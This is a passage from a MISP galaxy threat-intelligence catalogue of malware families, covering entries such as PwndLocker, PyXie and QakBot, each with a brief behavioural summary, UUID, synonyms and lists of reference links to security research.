- https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/ - webarchive
- http://malware-traffic-analysis.net/2017/04/03/index2.html - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Putabmow
Internal MISP references
UUID b0cb81bc-5d97-454a-8eee-4e81328c7228
which can be used as unique global reference for Putabmow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
puzzlemaker
The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack.
Internal MISP references
UUID 2c835470-1bd2-4bd6-a83b-e9c3e12fa0ad
which can be used as unique global reference for puzzlemaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PvzOut
Internal MISP references
UUID 52932caa-2fac-4eeb-88de-b3e143db010e
which can be used as unique global reference for PvzOut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PwndLocker
PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PwndLocker.
Known Synonyms |
---|
ProLock |
Internal MISP references
UUID fe0cf4ab-f151-4549-8127-f669c319d546
which can be used as unique global reference for PwndLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/ - webarchive
- https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/ - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/ - webarchive
- https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/ - webarchive
- https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji - webarchive
- https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/ - webarchive
- https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html - webarchive
- https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/ - webarchive
- https://www.group-ib.com/blog/prolock_evolution - webarchive
- https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.intrinsec.com/egregor-prolock/ - webarchive
- https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html - webarchive
- https://www.group-ib.com/blog/prolock - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pwnpos
Internal MISP references
UUID c903627c-90f6-44ee-9750-4bb44bdbceab
which can be used as unique global reference for pwnpos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/ - webarchive
- https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html - webarchive
- https://twitter.com/physicaldrive0/status/573109512145649664 - webarchive
- https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.pyfiledel
Py2exe-built worm that propagates via USB drives and has wiper functionality embedded in its logic (triggered when the current date is later than 2016-04-03 and the file C:\txt.txt exists).
Internal MISP references
UUID ea8f44b0-6940-42e0-a93f-77a6b572b140
which can be used as unique global reference for win.pyfiledel
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pykspa
According to Akamai, Pykspa is a worm that spreads via Skype by sending messages to other Skype users with download links. Once downloaded, Pykspa extracts personal information and communicates with its command and control servers (C2) using a domain generation algorithm (DGA).
Internal MISP references
UUID 3f0e7db1-5944-4137-89d1-d36940f596d2
which can be used as unique global reference for Pykspa
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa - webarchive
- https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/ - webarchive
- https://bin.re/blog/pykspas-inferior-dga-version/ - webarchive
- https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html - webarchive
- https://www.youtube.com/watch?v=HfSQlC76_s4 - webarchive
- https://bin.re/blog/the-dga-of-pykspa/ - webarchive
- https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PyLocky
PyLocky is a ransomware that tries to pass itself off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PyLocky.
Known Synonyms |
---|
Locky Locker |
Internal MISP references
UUID 3a5775d3-7d4a-4795-b1b1-7a340030d490
which can be used as unique global reference for PyLocky
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky - webarchive
- https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html - webarchive
- https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/ - webarchive
- https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/ - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/ - webarchive
- https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/ - webarchive
- https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/ - webarchive
- https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PyXie
Full-featured Python RAT compiled into an executable.
PyXie RAT functionality includes:
- Man-in-the-middle (MITM) interception
- Web-injects
- Keylogging
- Credential harvesting
- Network scanning
- Cookie theft
- Clearing logs
- Recording video
- Running arbitrary payloads
- Monitoring USB drives and exfiltrating data
- WebDav server
- Socks5 proxy
- Virtual Network Connection (VNC)
- Certificate theft
- Inventorying software
- Enumerating the domain with Sharphound
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PyXie.
Known Synonyms |
---|
PyXie RAT |
Internal MISP references
UUID 41217f01-2b03-41c1-88fc-cda1eee65f75
which can be used as unique global reference for PyXie
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/ - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/ - webarchive
- https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3 - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4 - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-dupont - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Qaccel
Internal MISP references
UUID f4980a75-f72c-4925-8ff5-118b32dd5eaa
which can be used as unique global reference for Qaccel
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Qadars
Internal MISP references
UUID 080b2071-2d69-4b76-962e-3d0142074bcb
which can be used as unique global reference for Qadars
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://securityintelligence.com/an-analysis-of-the-qadars-trojan/ - webarchive
- https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/ - webarchive
- https://www.johannesbader.ch/2016/04/the-dga-of-qadars/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan - webarchive
- https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QakBot
QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active since 2007. It has historically been known as a banking trojan, meaning that it steals financial data from infected systems, and as a loader that uses C2 servers for payload targeting and download.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QakBot.
Known Synonyms |
---|
Oakboat |
Pinkslipbot |
Qbot |
Quakbot |
Internal MISP references
UUID 2ccaccd0-8362-4224-8497-2012e7cc7549
which can be used as unique global reference for QakBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot - webarchive
- https://blog.quosec.net/posts/grap_qakbot_navigation/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot - webarchive
- https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/ - webarchive
- https://web.archive.org/web/20151026140427/https://www.symantec.com/security_response/writeup.jsp?docid=2009-050707-0639-99 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-lagoon - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html - webarchive
- https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/ - webarchive
- http://blog.opensecurityresearch.com/2011/12/intro-to-reversing-w32pinkslipbot.html - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot - webarchive
- https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html - webarchive
- https://quosecgmbh.github.io/blog/grap_qakbot_strings.html - webarchive
- https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/ - webarchive
- https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan - webarchive
- https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies - webarchive
- https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks - webarchive
- https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ - webarchive
- https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/ - webarchive
- https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html - webarchive
- https://github.com/m4now4r/Presentations/blob/main/Unveiling%20Qakbot%3A%20Exploring%20one%20of%20the%20Most%20Active%20Threat%20Actors/Unveiling%20Qakbot_Exploring%20one%20of%20the%20Most%20Active%20Threat%20Actors.pdf - webarchive
- https://twitter.com/kienbigmummy/status/1460537501676802051 - webarchive
- https://isc.sans.edu/diary/rss/28568 - webarchive
- https://intel471.com/blog/conti-emotet-ransomware-conti-leaks - webarchive
- https://twitter.com/Unit42_Intel/status/1461004489234829320 - webarchive
- https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/ - webarchive
- https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/ - webarchive
- https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/ - webarchive
- https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf - webarchive
- https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf - webarchive
- https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/ - webarchive
- https://www.atomicmatryoshka.com/post/malware-headliners-qakbot - webarchive
- https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns - webarchive
- https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/ - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2020 - webarchive
- https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/ - webarchive
- https://blog.vincss.net/re021-qakbot-analysis-dangerous-malware-has-been-around-for-more-than-a-decade/ - webarchive
- https://censys.com/a-beginners-guide-to-tracking-malware-infrastructure/ - webarchive
- https://experience.mandiant.com/trending-evil-2/p/1 - webarchive
- https://sansorg.egnyte.com/dl/ALlvwK6fp0 - webarchive
- https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/ - webarchive
- https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/ - webarchive
- https://twitter.com/alex_il/status/1384094623270727685 - webarchive
- https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.youtube.com/watch?v=utqaGgnb5yM - webarchive
- https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf - webarchive
- http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf - webarchive
- https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/ - webarchive
- https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html - webarchive
- https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/ - webarchive
- https://www.intrinsec.com/egregor-prolock/ - webarchive
- https://embee-research.ghost.io/advanced-threat-intel-queries-catching-83-qakbot-servers-with-regex-censys-and-tls-certificates/ - webarchive
- https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs - webarchive
- https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/ - webarchive
- https://web.archive.org/web/20120206174705/http://blogs.rsa.com/rsafarl/businesses-beware-qakbot-spreads-like-a-worm-stings-like-a-trojan/ - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- https://web.archive.org/web/20110406012907/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-ii - webarchive
- https://syrion.me/qakbot-bb-extractor/ - webarchive
- https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails - webarchive
- https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps - webarchive
- https://www.silentpush.com/blog/malicious-infrastructure-as-a-service - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://bin.re/blog/the-dga-of-qakbot/ - webarchive
- https://www.bitsight.com/blog/emotet-botnet-rises-again - webarchive
- https://www.justice.gov/d9/2023-08/23mj4244_application_redacted.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf - webarchive
- https://www.malwarology.com/posts/3-qakbot-process-injection/ - webarchive
- https://www.justice.gov/usao-cdca/pr/qakbot-malware-disrupted-international-cyber-takedown - webarchive
- https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/ - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic - webarchive
- https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf - webarchive
- https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf - webarchive
- https://invokere.com/posts/2024/02/automating-qakbot-malware-analysis-with-binary-ninja/ - webarchive
- https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources - webarchive
- https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/ - webarchive
- https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/ - webarchive
- https://twitter.com/redcanary/status/1334224861628039169 - webarchive
- https://www.spamhaus.org/news/article/819/qakbot-the-takedown-and-the-remediation - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html - webarchive
- https://www.secureworks.com/blog/law-enforcement-takes-down-qakbot - webarchive
- https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/ - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction - webarchive
- https://www.um.edu.mt/library/oar/handle/123456789/76802 - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://redcanary.com/blog/intelligence-insights-november-2021/ - webarchive
- https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/ - webarchive
- https://www.youtube.com/watch?v=gk7fCC5RiAQ - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf - webarchive
- https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7 - webarchive
- https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques - webarchive
- https://twitter.com/elisalem9/status/1381859965875462144 - webarchive
- https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/ - webarchive
- https://d01a.github.io/pikabot/ - webarchive
- https://malcat.fr/blog/writing-a-qakbot-50-config-extractor-with-malcat/ - webarchive
- https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/ - webarchive
- https://blog.quosec.net/posts/grap_qakbot_strings/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware - webarchive
- https://blog.lumen.com/qakbot-retool-reinfect-recycle/ - webarchive
- https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a - webarchive
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution - webarchive
- https://twitter.com/ChouchWard/status/1405168040254316547 - webarchive
- https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex - webarchive
- https://www.youtube.com/watch?v=1gExOpNqXYo - webarchive
- https://threatresearch.ext.hp.com/detecting-ta551-domains/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://twitter.com/Corvid_Cyber/status/1455844008081641472 - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://hatching.io/blog/reversing-qakbot - webarchive
- https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841 - webarchive
- https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view - webarchive
- https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://redcanary.com/blog/intelligence-insights-december-2021 - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://www.youtube.com/watch?v=0WNPjG8HjOw - webarchive
- https://www.youtube.com/watch?v=4I0LF8Vm7SI - webarchive
- https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/ - webarchive
- https://www.youtube.com/watch?v=M22c1JgpG-U - webarchive
- https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/ - webarchive
- https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/ - webarchive
- https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-lagoon - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/ - webarchive
- https://blog.talosintelligence.com/following-the-lnk-metadata-trail - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://isc.sans.edu/diary/rss/28728 - webarchive
- https://www.shadowserver.org/news/qakbot-botnet-disruption/ - webarchive
- https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory - webarchive
- https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/ - webarchive
- https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917 - webarchive
- https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html - webarchive
- https://x.com/bryceabdo/status/1790457784099614776 - webarchive
- https://twitter.com/TheDFIRReport/status/1361331598344478727 - webarchive
- https://blog.group-ib.com/prometheus-tds - webarchive
- https://syrion.me/malware/qakbot-bb-extractor/ - webarchive
- https://malwareandstuff.com/upnp-messing-up-security-since-years/ - webarchive
- https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4 - webarchive
- https://isc.sans.edu/diary/rss/26862 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html - webarchive
- https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor - webarchive
- https://www.malwarology.com/posts/4-qakbot-api-hashing/ - webarchive
- https://www.team-cymru.com/post/visualizing-qakbot-infrastructure - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot - webarchive
- https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/ - webarchive
- https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb - webarchive
- https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html - webarchive
- https://twitter.com/embee_research/status/1592067841154756610?s=20 - webarchive
- https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis - webarchive
- https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/ - webarchive
- https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight - webarchive
- https://www.circl.lu/pub/tr-64/ - webarchive
- https://www.youtube.com/watch?v=WcFfgEZwEgM - webarchive
- https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise - webarchive
- https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga - webarchive
- https://www.reliaquest.com/blog/qbot-black-basta-ransomware/ - webarchive
- https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/ - webarchive
- https://www.malwarology.com/2022/04/qakbot-series-process-injection/ - webarchive
- https://www.youtube.com/watch?v=OCRyEUhiEyw - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks - webarchive
